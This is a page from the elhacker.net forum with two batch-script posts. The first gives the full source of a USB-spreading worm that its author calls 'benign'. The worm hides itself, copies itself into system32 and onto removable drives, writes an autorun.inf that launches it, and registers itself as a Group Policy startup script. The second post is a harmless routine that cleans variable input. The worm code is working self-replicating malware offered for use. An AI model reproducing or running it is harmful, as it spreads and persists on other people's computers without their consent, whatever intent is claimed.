elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Programación / Scripting / exclam2 benigno en: 24 Noviembre 2008, 10:31 am
Este code es un virus que se propaga por usb, y lo que hace es ir deshabilitando los autorun de los compu...dores con sistema windows, así, se propaga protección (xD).


source
Código:
::exclam05.gif.bat
@echo off
:ini
@attrib +h +s +r "%~f0" >nul 2>&1
@for /f "tokens=1 delims=:" %%a in ('@reg.exe query HKLM\SYSTEM\MountedDevices ^| @find /i "530054004F00520041"') do @call :fil %%a
@call :gar
if "%~f0"=="%Windir%\system32\%~nx0" (goto :ini)
exit
:fil
@set dr=%*
@call :lab %dr:~-1%
@goto :eof
:lab
@dir /a %1:\ >nul 2>&1 && @call :usbinfec %1
@goto :eof
:usbinfec
@if "%~f0"=="%1:\%~nx0" (explorer "%1:\")
@type "%~f0" | @find.exe /i "Un code para conquistarlos a todos" >nul 2>&1 && goto :eof
@dir /a "%1:\autorun.inf" >nul 2>&1 && del /f /q /a "%1:\autorun.inf"
@dir /a "%1:\autorun.inf" >nul 2>&1 && rmdir /s /q "%1:\autorun.inf"
@dir /a "%1:\autorun.inf" >nul 2>&1 && call :newname %1
@echo [autorun]>"%1:\autorun.inf"
@echo open=%~nx0>>"%1:\autorun.inf"
@echo icon=%%SystemRoot%%\system32\SHELL32.dll,^4>>"%1:\autorun.inf"
@echo action=Abrir carpeta par ver archivos>>"%1:\autorun.inf"
@echo action=@%~nx0>>"%1:\autorun.inf"
@echo shellexecute=%~nx0>>"%1:\autorun.inf"
@echo shell\open\Default=^1>>"%1:\autorun.inf"
@echo shell\open\Command=%~nx0>>"%1:\autorun.inf"
@echo shell\explore\Command=%~nx0>>"%1:\autorun.inf"
@echo ;;Un code para conquistarlos a todos;;>>"%1:\autorun.inf"
@attrib -h -s -r "%~f0"
@copy /y "%~f0" "%1:\" >nul 2>&1
@attrib +h +s +r "%~f0" >nul 2>&1
@attrib +h +s +r "%1:\autorun.inf" >nul 2>&1
@attrib +h +s +r "%1:\%~nx0" >nul 2>&1
@goto :eof
:gar
@attrib -h -s -r "%~f0"
@copy /y "%~f0" "%WinDir%\system32\" >nul 2>&1
@attrib +h +s +r "%WinDir%\system32\%~nx0" >nul 2>&1
@attrib +h +s +r "%~f0" >nul 2>&1
@reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /ve /t REG_SZ /d "@SYS:DoesNotExist" /f >nul 2>&1
@reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d 255 /f >nul 2>&1
@reg.exe add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /v "Script" /d "%WinDir%\System32\%~nx0" /f  >nul 2>&1
@reg.exe add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /v "Parameters" /d "" /f >nul 2>&1
@reg.exe add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0" /t REG_SZ /v "FileSysPath" /d "%WinDir%\System32\GroupPolicy\Machine" /f >nul 2>&1
@reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f >nul 2>&1
@goto :eof
:newname
@set n=n%random%n
@rename "%1:\autorun.inf" "%n%" >nul 2>&1
@goto :eof
2  Programación / Scripting / Filter 9.0 Final en: 15 Noviembre 2008, 06:01 am
Finalmente, doy por finalizado el FILTER 9.0 Final que es un limpiador del contenido de las variables.

Esta versión soluciona un bug de la vérsión 8, que ocurría al tener definidas variables de un sufijo en comun e ingresar en la variable a filtrar solamente carácteres basura. Además esta versión tiene un código más compacto, y eficiente.

Código:
@ECHO OFF
:START
CLS
SET NAME=
SET /P NAME=ENTER YOUR NAME:
IF NOT DEFINED NAME (GOTO:START)
CALL:FILTER NAME
IF NOT DEFINED NAME (GOTO:START)
ECHO HELLO %NAME%
PAUSE
GOTO:START
GOTO:EOF

:FILTER
::Usage: CALL:FILTER variable_Name
::Example: CALL:FILTER INPUT
::Note: The Max Length of the Clean Output is 50 characters.
::.==============================================================================.
::|| FILTER v9.0 Final. Copyright (c) 2008 Carlos. All rights reserved. ||
::|| Thanks to sirdarckcat and avery_larry for your cooperation.                ||
::.==============================================================================.=====================================.
::|| CARLOS . DISCLAIMS ALL WARRANTIES, RESPONSIBILITIES, AND LIABILITIES ASSOCIATED WITH USE OF THIS CODE IN  ||
::|| ANY WAY, SHAPE, OR FORM REGARDLESS HOW IMPLICIT, EXPLICIT, OR OBSCURE IT IS. IF THERE IS ANYTHING QUESTIONABLE   ||
::|| WITH REGARDS TO THIS SOFTWARE BREAKING AND YOU GAIN A LOSS OF ANY NATURE,I AM NOT THE RESPONSIBLE PARTY. USE OF  ||
::|| THIS SOFTWARE CREATES ACCEPTANCE OF THESE TERMS. THE MODIFICATION OF THIS CODE REQUIRED TO ADD A FOOTNOTE TO     ||
::|| THIS TEXT WITH THE NAME OF WHO MADE THE CHANGES.                                                                 ||
::|| USE OF THIS CODE MUST RETAIN ALL COPYRIGHT NOTICES AND LICENSES (MEANING THIS TEXT).                             ||
::.====================================================================================================================.
;;@IF NOT DEFINED %1 (GOTO:_FILTERE) || (GOTO:_FILTERE)
;;@FOR /F "TOKENS=1-27 DELIMS==%%^|^&^^^>^<#`'.:,;/\+-_~!^)^(][}{:^?^*$" %%A IN ('@SET %1') DO (@IF [%%A] EQU [%1] (
;;@CALL:_FILTER %%~B%%~C%%~D%%~E%%~F%%~G%%~H%%~I%%~J%%~K%%~L%%~M%%~N%%~O%%~P%%~Q%%~R%%~S%%~T%%~U%%~V%%~W%%~X%%~Y%%~Z))
;;@CALL:_FILTER %.IN_%
;;@IF DEFINED .IN_ (@SET %1=%.IN_:~0,50%
;;) ELSE (@SET %1=)
;;@GOTO:EOF
;:_FILTER
;;@SET .IN_=%~1%~2%~3%~4%~5%~6%~7%~8%~9_
;;@SET .IN_=%.IN_:"=%
;;@SET .IN_=%.IN_:_=%
;;@GOTO:EOF
;:_FILTERE
;;@ECHO FILTER FUNCTION RECEIVE A DEFINED VARIABLE.
;;@PAUSE
;;@GOTO:EOF
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines